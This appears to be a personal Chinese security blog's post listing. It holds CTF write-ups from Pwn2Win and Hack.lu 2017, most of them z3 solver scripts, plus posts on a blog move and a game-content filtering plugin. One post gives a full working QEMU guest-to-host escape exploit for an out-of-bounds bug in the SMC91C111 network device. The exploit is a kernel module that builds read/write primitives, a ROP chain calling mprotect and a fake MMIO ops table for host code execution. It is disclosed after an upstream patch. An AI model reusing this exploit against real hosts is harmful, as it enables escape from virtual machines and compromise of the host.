0xe719e627a8:	0x0000000000841f0f,0x8944f6894cea894c
0xe719e627b8:	0xc38348dc14ff41ff,0x8348ea75dd394801
0xe719e627c8:	0x5d415c415d5b08c4,0x2e6690c35f415e41
0xe719e627d8:	0x0000000000841f0f,0x08ec83480000c3f3
0xe719e627e8:	0x000000c308c48348,0x6800732500020001
0xe719e627f8:	0x73257b6e6f637469,0x3b031b0100000a7d
0xe719e62808:	0x0000000700000040,0x0000008cfffffdbc
0xe719e62818:	0x000000b4fffffdcc,0x0000005cfffffdec
0xe719e62828:	0x000000ccffffff1c,0x000000ecffffff57
0xe719e62838:	0x0000010cffffff6c,0x00000154ffffffdc
0xe719e62848:	0x47cf6d49120447e7,0x2846fb67171be9b0 ; final
   hex(0xe719e6285f-0x000000e719e62000)

#include <stdio.h>
#include <string.h>
#include <tmmintrin.h>
#include <wmmintrin.h>
int main () {
    __int64_t a[2] = {0,0};
    __int64_t round_key[] = {0xfffe07e803fdc148,0xdb312074ed8548ff,0x0000000000841f0f,0x8944f6894cea894c,0xc38348dc14ff41ff,0x8348ea75dd394801,0x5d415c415d5b08c4,0x2e6690c35f415e41,0x0000000000841f0f,0x08ec83480000c3f3,0x000000c308c48348,0x6800732500020001,0x73257b6e6f637469,0x3b031b0100000a7d,0x0000000700000040,0x0000008cfffffdbc,0x000000b4fffffdcc,0x0000005cfffffdec,0x000000ccffffff1c,0x000000ecffffff57};
    __int64_t final[] = {0x47cf6d49120447e7^0x0000010cffffff6c,0x2846fb67171be9b0^0x00000154ffffffdc};
    __m128i mfinal = _mm_load_si128((__m128i *)final);
    for (int i=0;i<9;i++)
    {
        __int64_t* b = &round_key[(9-i)*2];
        __m128i key = _mm_load_si128((__m128i *)b);
        printf("Round key %d: %016llx %016llx\n",9-i,b[0],b[1]);
        mfinal = _mm_aesdec_si128(mfinal,_mm_aesimc_si128(key));
    }
    __m128i key = _mm_load_si128((__m128i *)&round_key);
    mfinal = _mm_aesdeclast_si128(mfinal,(key));
    _mm_storeu_si128(a, mfinal);
    printf("%llx %llx",a[0],a[1]);
    return 0;
}

天衣無縫~Fantastic Seamless Textile~

https://gist.github.com/pzread/2ae0bb3aa5fe0dc69fcf3257c41db944
https://github.com/radare/radare2/pull/8796

Pwn2Win2017 writeup

发表于 2017-10-23 | | 阅读次数:

周末做了两道题，想尝试下ppc结果因为电阻间不同阻值只存了后面那个被坑了一整天……Orz

PPC-M

Resistance

列KVL，设起点电压10终点电压0，然后z3求解。主办方表示卧槽这题z3居然能做？比预期解慢，但是起码是对的(:з)∠)

#!/usr/bin/python2
import ssl, socket
import z3
y = [z3.Real('a_%d'%i) for i in range(30)]
d = dict()
connection = dict()
nodes = set()
class Connect(object):
    def __init__(self, host, port):
        self.context = ssl.create_default_context()
        self.conn = self.context.wrap_socket(
            socket.socket(socket.AF_INET),
            server_hostname=host)
        self.conn.connect((host, port))
        self.f = self.conn.makefile('rwb', 0)
    def __enter__(self):
        return self.f
    def __exit__(self, type, value, traceback):
        self.f.close()
ncount = 0
with Connect('programming.pwn2win.party', 9001) as f:
#b = open('d.txt','w')
#with open('test.txt','rb') as f:
    for line in f:
        line = line.strip()
        print('received: %s' % line)
        if line.startswith(b'CTF-BR{') or \
           line == b'WRONG ANSWER': break
        numbers = map(int, line.split())
        if len(numbers)==3:
            if ncount==0:
                d = dict()
                connection = dict()
                nodes = set()
                            
            nodes.add(numbers[0])
            nodes.add(numbers[1])
            ar = min(numbers[0],numbers[1]),max(numbers[0],numbers[1])
            if ar not in d.keys():
                d[ar] = [numbers[2]]
            else:
                d[ar].append(numbers[2])
            if numbers[0] in connection.keys():
                if numbers[1] not in connection[numbers[0]]:
                    connection[numbers[0]].append(numbers[1])
            else:
                connection[numbers[0]] = [numbers[1]]
            if numbers[1] in connection.keys():
                if numbers[0] not in connection[numbers[1]]:
                    connection[numbers[1]].append(numbers[0])
            else:
                connection[numbers[1]] = [numbers[0]]
            ncount+=1
        elif len(numbers) == 2:
            ncount = 0
            if numbers[0]==numbers[1]:
                f.write('0.000\n')
                print "0.000"
                continue
            #solve all KVL
            s = z3.Solver()
            for m in nodes:
                sum = 0
                if m!=numbers[0] and m!=numbers[1]:
                    for n in connection[m]:
                        for k in d[min(n,m),max(n,m)]:
                            sum += ((y[m] - y[n]) / k)
                    s.add(sum == 0.0)
            s.add(y[numbers[0]]==10.0)
            s.add(y[numbers[1]]==0.0)
            s.check()
            m = s.model()
            #print m
            flag = map(lambda sym: m[sym], y)
            start = float(eval(str(flag[numbers[0]])+'.'))
            sum=0
            for n in connection[numbers[0]]:
                for k in d[min(numbers[0],n),max(n,numbers[0])]:
                    sum+=(m[y[numbers[0]]]-m[y[n]])/k
            sum = eval(str(z3.simplify(sum))+'.')
            f.write(("%.3f\n"%(10.0/sum)).encode('utf-8'))
            print "%.3f"%(10.0/sum)

Reversing

Achievement Unlocked

golang 写的，没啥好说的，z3解

import z3
ans_len = 30
y = z3.BitVecs(' '.join("a_%d"%i for i in xrange(ans_len)), 8)
x = [0]*ans_len
for i in range(ans_len):
    x[i] = z3.ZeroExt(8,y[i])
s = z3.Solver()
a = [217, 6, 224, 68, 21, 153, 30, 144, 249, 89, 109, 245, 111, 55, 163, 40, 174, 21, 115, 99, 173, 42, 12, 209, 143, 226, 47, 136, 158, 158, 58, 77, 67, 84, 70, 45, 66, 82, 123, 84, 104, 105, 115, 95, 67, 48, 85, 108, 100, 95, 66, 51, 95, 52, 83, 95, 101, 97, 83, 121, 95, 52, 115, 95, 116, 104, 49, 83, 125, 10, 19, 152, 116, 104, 49, 83, 125, 10, 19, 152, 81, 237, 69, 212, 147, 42, 94, 184, 20, 227, 251, 168, 210, 97, 183, 36, 147, 236, 35, 65, 192, 16, 128, 188, 52, 149, 46, 138, 17, 251, 86, 163, 62, 195, 119, 228, 54, 102, 57, 36, 145, 140, 174, 140, 172, 177, 154, 104, 150, 90, 39, 38, 237, 31, 142, 48, 59, 159, 63, 113, 82, 37, 81, 227, 122, 33, 149, 58, 87, 62, 78, 112, 54, 230, 37, 243, 4, 116, 210, 236, 47, 178, 81, 162, 38, 87, 131, 170, 100, 119, 36, 176, 131, 91, 119, 31, 57, 195, 53, 107, 14, 58, 20, 68, 20, 246, 207, 24, 82, 216, 21, 189, 18, 121, 155, 211, 192, 5, 248, 127, 229, 253, 124, 116, 67, 78, 43, 111, 75, 168, 11, 144, 29, 36, 28, 203, 224, 184, 10, 84, 30, 100, 168, 142, 164, 142, 34, 220, 96, 173, 118, 173, 157, 49, 231, 219, 13, 49, 35, 13]
final = [208, 113, 230, 50, 15, 58, 9, 46, 248, 161, 182, 82, 222, 205, 101, 114, 82, 159, 79, 185, 244, 114, 118, 193, 52, 53, 238, 247, 218, 80]
for i in range(len(a)/8):
    m = a[i*8:(i+1)*8]
    for j in range(8):
        x[i] = (1<<j)&m[j]^x[i]
for i in range(ans_len):
    s.add(x[i]==final[i])
if s.check() == z3.sat:
    m = s.model()
    print m
    flag = map(lambda sym: m[sym], y)
    flag = map(lambda val: chr(int(str(val))), flag)  # wtf
    print len(flag)
    print ''.join(flag)

Hack.lu 2017 writeup

发表于 2017-10-19 | | 阅读次数:

TO BE CONTINUE
这两天做了hacklu2017，随便写写，有空再补了。其实比较倒霉，6点比赛结束，6点02算出了LostKey的flag……手速还是不行啊，得多练……

Pwn

bit

40072b:4 - > loop
overwrite main ret instruction to long jump to start of main function input logic and reflip 40072b:4. Then write the shellcode to 0400741, and finally reflip 40072b:4 to get shellcode execute.

Rev

The Maya Society

13.0.0.0 on the home page is not a ip address, it’s 2012.12.21 in Maya calendar, just set the time to 2012.12.11 and run the program to get the flag.

Rusted from the Rain

Reverse and write script to solve.

import z3
ans_len = 28
y = z3.BitVecs(' '.join("a_%d"%i for i in xrange(ans_len)), 8)
x = [0]*ans_len
for i in range(ans_len):
    x[i] = z3.ZeroExt(8,y[i])
s = z3.Solver()
s.add(x[13]==x[14])
s.add(x[18]==x[19])
s.add(x[5]==x[26])
s.add(x[23]==x[7])
s.add(x[9]==x[16])
s.add(x[9]==x[21])
s.add(x[8]==x[22])
s.add(x[27]-x[4]==2)
s.add(x[0] ==63+7)
s.add(x[1] ==63+0xd)
s.add(x[2] ==63+2)
s.add(x[3] ==63+8)
s.add(x[21] <= 0x60)
s.add(x[14] + x[18] == 0xD1)
s.add(x[14] - x[18] == 7)
s.add(x[10] == x[15])
s.add((~x[24])&0xff & x[17]== 0)
s.add(x[17] == 115)
s.add((~(x[10] ^ 0x73)) & 0xFF == 0xFF)
s.add(((2 * x[25])&0xff) % x[24] == 2)
v12 = (x[23] + x[25])&0xff
s.add((v12 - 99 * ((83 * v12 & 0x6000) >> 13))== 35)
s.add(3 * x[11] + 2 * x[12] + x[20] == 640)
s.add( x[6] - 35 * ((235 * x[6] & 0xE000) >> 13) == 6)
s.add(x[8] != 0)
s.add((((2 * x[6])&0xff) % x[8]) & 0xFF == x[14] )
res = [0x7fed,0xfb11,0xeabe,0x2631]
for i in range(4):
	v17 = 0
	v20 = 0
	for j in range(7):
		v20 = (v20 + x[i*7+j]) % 0xFF
		v17 = (v20 + v17) % 0xFF
	s.add(res[i] == (v17 | (v20 << 8)))
if s.check() == z3.sat:
    m = s.model()
    print m
    flag = map(lambda sym: m[sym], y)
    flag = map(lambda val: chr(int(str(val))), flag)  # wtf
    print len(flag)
    print ''.join(flag)

LostKey

4 processes created by clone, shared memory. When the program init, some rops will be filled in each process’s stack, and the rops are the thing that check your flag.

anti-debug will be used in perior 3 processes, and generate the key to decode the input in thread 4.

So just track the right rops to get the algorithm. And write some scripts to calculate the flag.

Web,Rev

Triangle

Use chrome to decode the ARM binary code, we got two function, encode and test. Write a script to solve the problem.

import z3
x = [z3.BitVec(i, 8) for i in range(32)]
y = [0] * 32
s = z3.Solver()
a = "XYzaSAAX_PBssisodjsal_sSUVWZYYYb"
b = map(ord, a)
flag = 0
for i in range(32):
    ch = x[i]
    ch = z3.If(flag == 1, ch + (i & 3), ch)
    temp = ch + 6
    flag = temp & 1
    y[i] = temp
for i in range(32):
    ch = y[i] + 5
    if i & 1:
        ch = y[i] + 2
    s.add(ch == b[i])
if s.check() == z3.sat:
    m = s.model()
    print m
    flag = map(lambda sym: m[sym], x)
    flag = map(lambda val: chr(int(str(val))), flag)  # wtf
    print ''.join(flag)

Misc, Web

DnSoSecure

source audit, download the source.zip
git log and checkout last branch

get private and public key for setting up DNSSEC server.

ref:https://www.digitalocean.com/community/tutorials/how-to-setup-dnssec-on-an-authoritative-bind-dns-server--2

named.conf.default-zone

zone "otherside.earth.flux"{
	type master;
	file "/etc/bind/master/otherside.earth.flux.db.signed";
	allow-update { none; };
};

otherside.earth.flux.db

$TTL    3600
@       IN      SOA     ns1.otherside.earth.flux. root.otherside.earth.flux. (
                        2014072202; Serial
                        3600            ; Refresh
                        86400           ; Retry
                        2419200         ; Expire
                        604800 )        ; Negative Cache TTL
;
@       IN      A       127.0.0.1
@       IN      NS      ns1.earth.flux.
ns1	IN	A	127.0.0.1
$INCLUDE Kotherside.earth.flux.+007+11537.key
$INCLUDE Kotherside.earth.flux.+007+26883.key

use this command to sign and gen RRSIG

1	dnssec-signzone -A -3 $(head -c 1000 /dev/random \| sha1sum \| cut -b 1-16) -N INCREMENT -o otherside.earth.flux. -t otherside.earth.flux.db

use rndc reload to reload bind9 config

CAUTION: The file name must be like this

1
2

Kotherside.earth.flux.+007+11537.key      Kotherside.earth.flux.+007+26883.key      dsset-otherside.earth.flux.  otherside.earth.flux.db.signed
Kotherside.earth.flux.+007+11537.private  Kotherside.earth.flux.+007+26883.private  otherside.earth.flux.db

same as zone name. It’s important.

sudo apt install rng-tools to speed up sign progress

A qemu escape - SMC911 exploit

发表于 2017-08-22 | | 阅读次数:

中午整理Macbook硬盘的时候发现了这个半年前看到的然而并没有要来CVE号的漏洞。
嗯、反正也修了半年了，放个exploit……感谢白兔师傅和谢大哥的帮助。纪念那段从来没有挖到过qemu CVE的时光……

Mail

Hello Azure,
On Mon, 24 Oct 2016 09:02:19 GMT, azureyang# wrote:
> I found a OOB read/write bug that can cause code execution on host.
> The relation code is in
> hw/net/smc91c111.c:447
> s->data[n][p] = value;
> hw/net/smc91c111.c:553
> return s->data[n][p];
>
> failed to check the border of the passed value, the packet_num and ptr
> can be set by guest mmio operations. With the overwrite of s->mmio-
> >ops, code execution can be achieved.
Thank you so much for reporting this issue. A patch has been sent upstream to fix this issue.
IIUC, the SMSC91C111 ethernet controller is used on the ARM Versatile EP and other similar platforms. Which are mostly used in the prototype development environments. These platforms are not generally used with KVM to provide virtualised guest environments. We could not consider this issue for a CVE as the upstream Qemu project does not consider these issues to be security relevant.
Please see:
->
http://wiki.qemu.org/SecurityProcess#How_impact_and_severity_of_a_bug_is_decided
Thank you so much!
---
Prasad J Pandit / Red Hat Product Security

exploit

#include <linux/init.h>
#include <linux/module.h>
#include <linux/slab.h>
#define SMC911_BASE           (unsigned char *)0xd09a6000
void write_on()
{
    unsigned char * addr = SMC911_BASE;
    addr[14] = 2;
}
void set_addr(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    uint64_t ptr = offset%0x800;
    addr[2] = offset/0x800;
    addr[6] = ptr&0xff;
    addr[7] = ptr>>8;
}
void set_uint8(uint64_t offset,uint8_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    addr[8] = value;
}
void set_uint16(uint64_t offset,uint16_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    *(uint16_t *)&addr[8] = value;
}
void set_uint32(uint64_t offset,uint32_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    *(uint32_t *)&addr[8] = value;
}
void set_uint64(uint64_t offset,uint64_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    *(uint32_t *)&addr[8] = value&0xFFFFFFFF;
    set_addr(offset+4);
    *(uint32_t *)&addr[8] = value>>32;
}
void set_memset(uint64_t offset,uint64_t value,uint64_t cbmem)
{
    uint64_t i = 0;
    for (i = 0;i<cbmem;i+=8)
    {
        set_uint64(offset+i,value);
    }
}
void set_memcpy(uint64_t dst_offset,void * src,uint64_t cbmem)
{
    uint8_t * uc_src = (uint8_t*)src; 
    uint64_t i = 0;
    for (i = 0;i<cbmem;i+=8)
    {
        set_uint64(dst_offset+i,*(uint64_t *)(uc_src+i));
    }
}
uint8_t get_uint8(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    return addr[8];
}
uint16_t get_uint16(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    return *(uint16_t *)&addr[8];
}
uint32_t get_uint32(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    return *(uint32_t *)&addr[8];
}
uint64_t get_uint64(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    uint64_t low = 0,high = 0;
    set_addr(offset);
    low = *(uint32_t *)&addr[8];
    set_addr(offset+4);
    high = *(uint32_t *)&addr[8];
    return (uint64_t)high<<32 | low;
}
//qemu-system-arm -M versatilepb -kernel vmlinuz-3.2.0-4-versatile -initrd initrd.img-3.2.0-4-versatile -hda debian_wheezy_armel_standard.qcow2 -append "root=/dev/sda1" -net nic,model=smc91c111 -net user
//mprotect 0x7f11879a2eb0
//libcdata 0x7f1187c65b78
//delta = 0x2c2cc8
//offset = 0x2764
void smc_test(void)
{
    unsigned char * addr = SMC911_BASE;
    uint64_t rop [] = {
        0x00000000006bc31c,//pop rdi; ret;
        0,
        0x000000000052ac4c,//pop rsi; ret;
		0x10000,
		0x0000000000517ea5,//pop rdx; ret;
		0x0000000000000007,//RWE
		0x7f6a14afbeb0,//mprotect
        0x000000000052ac4c,//pop rsi; ret;
		0,
		0x00bc5c1b//jmp rsi;
    };
    uint32_t original_ops = 0, card_base = 0,data_offset=0x2384;
    uint64_t main_arena = 0;
    write_on();
    original_ops = get_uint32(0x43d0-data_offset);
    card_base = get_uint32(0x20b4)-0x4430;
    printk("Host card ops = 0x%0X\ncard base:0x%0X\nfake_mmio_ops:0x%0X\n",original_ops,card_base,card_base+data_offset+0x1800);
    set_memset(0x1800,0,0x80);
    set_uint32(0x1800+1,0x007e29ee);//pop rsi; pop rsp; ret 0x66ff
    set_uint64(0x1800+80,0x6161616162616161);//readb
    set_uint64(0x1800+88,0x6761616168616161);//readw
    set_uint64(0x1800+96,0x6361616164616161);//readl
    set_uint64(0x1800+104,0x696161616a616161);//writeb
    set_uint64(0x1800+112,0x6561616166616161);//writew
    set_uint64(0x1800+120,0x00ba8c41);//writel;push    rdx;call    qword ptr [rbx+1]
    set_uint64(0x1800+0x80,rop[0]+1);
    main_arena = get_uint64(0x2764);
    rop[1] = card_base&0xFFFFFFFFFFFFF000;
    rop[6] = main_arena - 0x2c2cc8;
    rop[8] = card_base+data_offset+0x1888;
    set_memcpy(0x1800+0x66FF+0x88,rop,sizeof(rop));
    set_memcpy(0x1800+0x88,shellcode,sizeof(shellcode));
    set_uint32(0x43d0-data_offset,card_base+data_offset+0x1800);
    *(uint32_t *)&addr[0] = card_base+data_offset+0x1800+0x80;//boom! Can only write low part to rdx because use 32 bit arm,
    //aarch64 can overwrite mmio->ops->valid->max_access_size and mmio->ops->write to achieve extended register control 
    //rsi -> 0-0xf
    //rdx -> 0-0xFFFFFFFF
    //rbx -> controled memory
}
int init_module(void)
{
    smc_test();
    return 0;
}
void cleanup_module(void)
{
}

Another new home

发表于 2017-08-16 | | 阅读次数:

umm，之前常年不管理wordpress，然后这玩意漏洞太多了导致坑娘服务器被撸……于是这次干脆直接要来域名在自己服务器上搭建了，因为wordpress臃肿而且漏洞多……所以以后就用hexo了，感觉这个还是挺清新的。以前的东搬不搬的看心情，各位老爷们要是想看以前的内容请直接访问Internet Archive，以后blog会继续更新。都好几年没写东西了，再不写点感觉自己都废了。

Favorite社通用和谐插件 v0.2【游戏全年龄化

发表于 2014-02-03 | | 阅读次数:

插件下载：
HarmoFavo

v0.2[2014.2.19]
[+]全自动配置
v0.11[2014.2.19]
[+]支持Wiz Anniversary、funta支持不能……那玩意章节表比较奇葩、
[+]CG Patch
v0.1 [2014.2.3]
第一个版本

本插件理论上支持所有使用Favorite社游戏引擎的游戏、并且目前已有的3个汉化版全部支持、现在已经支持全自动和谐……您只需要将本插件释放到游戏目录并用AlphaROMdiE装载游戏即可。
使用方法：【请在使用前认真阅读！
首先确保您的游戏目录是这样的、HarmoFavo下载下去以后直接释放到游戏目录即可

上个图证明可以支持光鸟鸟、色鸟鸟也可以支持、方法看评论一楼的回复
和谐后的光鸟鸟、其他的图就不上了……那个加奈和澪的3P因为是男猪开脑洞梦到的……所以那个没辙╮(￣▽￣”)╭ 顾及18R的小盆友要玩的时候要小心这个坑。

【这里为老版本的说明、不必阅读】然后打开plugin目录、创建一个文本文档命名为config、然后里面的内容是需要解析的游戏的hcb文件。【为了兼容各种汉化补丁所以没有搞成自动的、搞成自动的兼容性会降低的。然后把那个文件从游戏目录复制到plugin目录下、比如我要让星空的记忆FD汉化版和谐一下，就复制汉化后的脚本执行体hoshimemo_ehchn.bch到plugin目录然后再填写config的内容即可。如下图

然后回到游戏目录、启动AlphaROMdiE、勾选禁止转码、把游戏可执行文件拖到上面、比如汉化版是Hoshimemo_EHchn.exe、然后会生成一个快捷方式、以后从这里点进去就是和谐版的游戏啦~

和谐效果如下图

被屏蔽掉的肯定就是H图啦~

有一个误伤的没办法、后来确认了下那张CG的确是出现在某H情节里……

啧啧啧、看看这有多少H

ETC的内容还是可以全部看到的(:з」∠)这里一般不会有H的

吐槽时间：
(:з」∠)这两天戳了下Favorite的引擎、感谢AmaranthF对Favorite社游戏引擎的vm拆解……

hcb可执行体主要分成几个区域

———————
public functions
———————
dispatcher
———————
para jumper[optional]
———————
para code
———————
H memo code
———————

目前的做法比较简单粗暴、就是计算一下H memo code起始的地方、如果有call到这里的话直接给ret回去
插件关键代码

vector<DWORD> ChcbVM::GetNCallSequence(DWORD & offset)
{
	return GetLastNCallSequenceCond(offset,0x01);
}
vector<DWORD> ChcbVM::GetLastNCallSequenceCond(DWORD & offset, BYTE bOP)
{
	vector<DWORD> retVal;
	DWORD ori = bin.seek(0,FILE_CURRENT);
	bin.seek(offset,FILE_BEGIN);
	WORD tmp1;
	BYTE tmp0;
	do 
	{
		bin.read(&tmp0,1);//skip initStack
		offset++;
	} while (tmp0!=0x01);//从一个函数头开始反编译
	bin.read(&tmp1,2);//skip initStack param
	offset+=2;
	for (BYTE op;;)
	{
		op=bin.readb();
		if (op == 0x2)//native call
		{
			DWORD native = bin.readdw();
			retVal.push_back(native);
			offset+=5;
		}
		else if (op==0x1)
		{
			break;
		}
		else if (op==bOP)
		{
			retVal.clear();
			offset+=vmlde(op);
		}
		else
		{
			offset+=vmlde(op);
		}
	}
	bin.seek(ori,FILE_BEGIN);
	return retVal;
}
int comp(const void* a,const void* b)
{
	return *(PDWORD)a>*(PDWORD)b;
}
vector<DWORD> ChcbVM::GetNCallList(DWORD & offset)
{
	auto && res = GetNCallSequence(offset);
	sort(res.begin(),res.end());
	vector<DWORD> retVal;
	for (size_t idx = 0;idx<res.size();++idx)
	{
		if (*(retVal.end()-1)!=res[idx])
		{
			retVal.push_back(res[idx]);
		}
	}
	return retVal;
}
DWORD ChcbVM::AnalysisPara(void)
{
	auto && res = GetLastNCallSequenceCond(hdr.EntryPoint,0x7);//最后的条件跳转后的calllist
	/*
	22C85	jz 22C8F
	22C8A	call 233EC;title
	22C8F	call 22CB1;start
	*/
	DWORD offsetParaDispacher = 0;
	if (res.size())
	{
		int idx = 1;
search0:
		DWORD offset = res[idx];
		auto && res2 = GetNCallSequence(offset);//for most game
		if (res2.size()<=2)
		{
			offsetParaDispacher = *(res2.end() - 1);
		}
		else
		{
			++idx;//Wiz
			goto search0;
		}
	}
	auto && ParaList = GetNCallList(offsetParaDispacher);
	return GetNextFuncOffset(*(ParaList.end() - 1));
}
typedef DWORD (__fastcall __pfnvCall)(void *unk1,DWORD unk0);
DWORD __fastcall vCall(
	void *unk1,//ecx
	DWORD unk0,//edx
	DWORD RetAddr,
	__pfnvCall pfnvCall)
{
	PDWORD pvIP = PDWORD((char *)unk1+offsetvIP);
	if (*pvIP>offsetLast)
	{
		*pvIP = offsetLast;
		return offsetLast;
	}
	return pfnvCall(unk1,unk0);
}

Azure

次元の壁乗り越えてあなたに会ってみたい

RSS

GitHub Twitter